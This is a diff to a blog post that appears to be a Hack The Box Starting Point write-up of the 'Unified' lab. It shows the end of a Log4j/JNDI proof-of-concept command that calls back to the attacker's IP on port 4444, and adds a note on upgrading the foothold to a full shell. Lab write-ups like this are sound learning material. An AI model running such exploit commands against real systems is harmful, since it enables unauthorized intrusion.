benmeller/security-journey/src/content/blog/htb-starting-point/tier-2-unified.md

 -u https://$TARGET$:8443 -i <my IP> -p 4444
 ```

 Success!
-We now have a foothold.
+We now have a foothold and can upgrade to a full shell by `script /dev/null -c bash`
+> TODO: Why `script /dev/null -c bash`??

 ![JNDI exploit success using the log4junifi poc](../../../../public/img/blog/htb-starting-point/unified-jndi-exploit.png)